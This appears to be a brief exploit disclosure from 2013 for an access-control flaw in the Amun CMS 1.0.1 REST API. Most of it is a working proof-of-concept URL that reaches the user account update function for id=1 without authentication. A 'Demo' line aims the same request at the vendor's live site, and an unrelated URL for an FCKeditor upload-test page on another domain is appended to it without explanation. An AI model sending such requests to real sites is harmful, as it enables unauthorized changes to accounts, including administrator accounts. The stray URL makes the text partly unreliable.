Amun CMS 1.0.1 REST API No Access Restriction

Author      : syst3m_f4ult
Homepage    : http://amun-project.org
Vendor      : Amun CMS
Version     : 1.0.1 (probably all versions)
Tested on   : ubuntu 12.04
Date        : 2013-10-11
-----------------------------------------------------------------------
I.  POC & Exploit
-----------------------------------------------------------------------
Default     :   http://127.0.0.1/

exploit     :   http://127.0.0.1/
index.php/api/user/account/form?format=xml&method=update&id=1

Demo        :
http://amun-project.org/index.php/api/user/account/form?format=xml&method=update&id=1<http://demo-en.automne.ws/automne/fckeditor/editor/filemanager/connectors/uploadtest.html>